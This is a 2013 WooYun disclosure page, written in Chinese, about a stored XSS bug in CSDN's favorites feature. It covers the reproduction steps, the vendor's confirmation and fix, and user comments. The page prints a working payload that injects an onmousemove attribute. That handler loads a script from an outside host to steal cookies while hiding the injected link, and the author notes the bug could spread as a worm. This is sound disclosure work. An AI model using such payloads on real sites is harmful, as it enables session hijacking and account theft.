当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032584

漏洞标题:CSDN XSS第一弹:修复漏洞时指哪修哪的后果

相关厂商:CSDN开发者社区

漏洞作者: 橙夏

提交时间:2013-07-28 14:05

修复时间:2013-09-11 14:05

公开时间:2013-09-11 14:05

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-28: 细节已通知厂商并且等待厂商处理中
2013-07-28: 厂商已经确认,细节仅向厂商公开
2013-08-07: 细节向核心白帽子及相关领域专家公开
2013-08-17: 细节向普通白帽子公开
2013-08-27: 细节向实习白帽子公开
2013-09-11: 细节向公众公开

简要描述:

CSDN某存储XSS漏洞被爆出后未被完全修复,因此留下了可利用的机会。
求rank - -

详细说明:

问题在CSDN空间的“收藏”功能上。
我们可以把任意一个URL在空间发表出来,这个URL还能在个人动态里产生一个链接。
但是在动态里,输出这个链接的时候,过滤并不完全。虽然过滤了<>这样的字符,但是我们仍然可以通过闭合属性的方式,往URL里插入任意HTML属性,导致了xss爆发。
1、进入自己的空间收藏(http://my.csdn.net/my/favorite),点击添加

a1.png


2、试着往链接里插入个test属性

a2.png


3、来到我的主页(http://my.csdn.net/u011311506),可以看到,作为个人动态,属性原封不动地写了出来

a3.png


4、要是加入的属性是onmousemove呢?这已经可以说明问题了,但是为了证明这个小洞可以较隐秘地偷走cookie,我在输入网址时构造了这么一行代码:
http://wooyun.org"
class="MikuXSS"
onmousemove="$.getScript('http://mikuxss.sinaapp.com/12CmMi');$('.MikuXSS').hide();"
style="font-size:1px;width:100%;height:100%;position:absolute;left:0px;top:0px;cursor:default;
显而易见,这个链接覆盖整个页面,当鼠标移动时就会加载指定脚本,将链接自动隐藏。
再弄个人畜无害的标题

a4.png


5、这个网页看起来很正常,但你的cookies已经被偷走了。

a5.png

漏洞证明:

用我的小号登录,打开上面链接

a6.png


a7.png

修复方案:

htmlentities($_POST['url']);
此漏洞可用于蠕虫传播,未测试。(求rank- -

版权声明:转载请注明来源 橙夏@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-07-28 16:43

厂商回复:

谢谢报告

最新状态:

2013-07-29:已经修复漏洞。

漏洞评价:

评论

  1. 2013-07-28 14:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    指哪修哪最不对了

  2. 2013-07-28 14:27 | 橙夏 ( 实习白帽子 | Rank:35 漏洞数:4 | 喵呜喵呜喵呜呜呜 喵呜呜喵呜呜呜呜 喵呜呜...)

    @xsser 就是!爆过两次了都!

  3. 2013-07-28 14:28 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    运维修洞经常指哪修哪,安全普及真重要。

  4. 2013-07-28 14:33 | 橙夏 ( 实习白帽子 | Rank:35 漏洞数:4 | 喵呜喵呜喵呜呜呜 喵呜呜喵呜呜呜呜 喵呜呜...)

    话说这次审核不是一般的快

  5. 2013-07-28 16:29 | n0bele ( 普通白帽子 | Rank:220 漏洞数:45 | 无耻最寂寞)

    知道是哪了

  6. 2013-07-28 20:02 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    指哪修哪最不对了